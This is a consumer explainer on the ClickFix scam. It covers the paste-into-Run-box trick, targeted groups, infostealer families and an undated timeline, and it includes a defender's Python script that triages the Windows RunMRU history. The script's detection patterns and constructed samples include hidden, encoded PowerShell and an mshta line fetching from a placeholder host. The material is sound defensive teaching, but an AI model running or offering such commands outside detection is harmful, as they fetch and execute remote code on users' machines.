What is ClickFix?
ClickFix is a scam that tricks people into running malicious software on their own computers. It works by making you think your browser or computer has a problem that needs fixing.
How is it different from other scams?
Most computer scams try to get you to download a file. Your browser usually warns you about suspicious downloads. ClickFix is sneakier—it gets around these warnings by making you run the malicious code yourself using your computer's built-in tools.
The key trick:
Instead of downloading a file, ClickFix tells you to:
- Press Windows + R (opens the Windows Run box, a system command window)
- Press Ctrl + V (pastes a hidden command)
- Press Enter (runs the malicious code)
Because you're the one pressing the keys, your computer's security software doesn't stop it.
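For defenders: Windows keeps a per-user history of what was typed into the Run box in the RunMRU registry key, so a pasted command usually leaves a trace there. The script below is an added example, not part of the original page. It triages that history; its matching rules and sample entries are assumptions made up for illustration.

```python
import re

# Per-user history of commands typed into the Run dialog (Win+R), under HKCU.
RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristics chosen for this example (assumptions); tune them for your environment.
INTERPRETER = re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)\b", re.I)
INDICATORS = [
    ("remote-url", re.compile(r"https?://", re.I)),
    ("hidden-or-encoded", re.compile(r"\s-(w\w*\s+h\w*|e\w*\s+\S{8,})", re.I)),
    ("unusually-long", re.compile(r".{200,}", re.S)),
]

def read_runmru():
    """Read the current user's RunMRU values (Windows only)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_PATH) as key:
        count = winreg.QueryInfoKey(key)[1]  # number of values under the key
        return {n: str(d) for n, d, _ in (winreg.EnumValue(key, i) for i in range(count))}

def triage(values):
    """Return (name, command, reasons) for suspicious entries, newest first."""
    order = [n for n in values.get("MRUList", "") if n in values]
    findings = []
    for name in order:
        cmd = values[name]
        if cmd.endswith("\\1"):  # Explorer appends "\1" to each stored entry
            cmd = cmd[:-2]
        if not INTERPRETER.search(cmd):
            continue  # plain program names and folder paths are ignored
        reasons = [label for label, rx in INDICATORS if rx.search(cmd)]
        if reasons:
            findings.append((name, cmd, reasons))
    return findings

# Constructed sample data, not taken from a real incident.
SAMPLE = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "powershell -w hidden -enc <constructed-placeholder>\\1",
    "d": "mshta https://example.invalid/check\\1",
}

if __name__ == "__main__":
    for name, cmd, reasons in triage(SAMPLE):
        print(f"{name}: {cmd!r} -> {', '.join(reasons)}")
```

On a Windows machine, `triage(read_runmru())` checks the logged-in user's real history. An empty result does not prove nothing happened, because the history can be cleared.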
Who gets targeted?
Anyone can encounter ClickFix, but attackers have specifically targeted:
- Healthcare workers - Through compromised medical resource websites
- Hotel staff - Via fake Booking.com emails
- Office workers - Through fake Google Meet or Microsoft Teams links
- Online shoppers - On compromised e-commerce sites
How big is the problem?
What happens if you fall for it?
The malicious code typically installs "infostealer" software that:
- Steals all your saved passwords from your browser
- Takes your login cookies (so attackers can access your accounts)
- Searches for cryptocurrency wallet files
- Captures screenshots of your screen
- Sometimes installs ransomware or remote access tools
Common Malware Families
These are the actual malware programs distributed through ClickFix attacks:
- Lumma Stealer (LummaC2) - The most common. Steals passwords, cookies, and cryptocurrency wallets.
- Vidar Stealer - Similar to Lumma, focuses on browser data and crypto.
- DarkGate - A "Remote Access Trojan" that gives attackers full control of your computer.
- AsyncRAT / DCRAT - Tools that let attackers spy on you and control your PC remotely.
Timeline: How ClickFix Evolved
Security researchers first identify the ClickFix technique being used in the wild.
Microsoft Threat Intelligence warns of Storm-1607 campaigns targeting tens of thousands of organizations.
Cybercrime groups Slavic Nation Empire and Scamquerteo begin using ClickFix for cryptocurrency scams.
"ClickFix builders" start being sold on hacker forums, making the attack accessible to less-skilled criminals.
Attacks increase by over 500%, becoming the second most common attack method globally.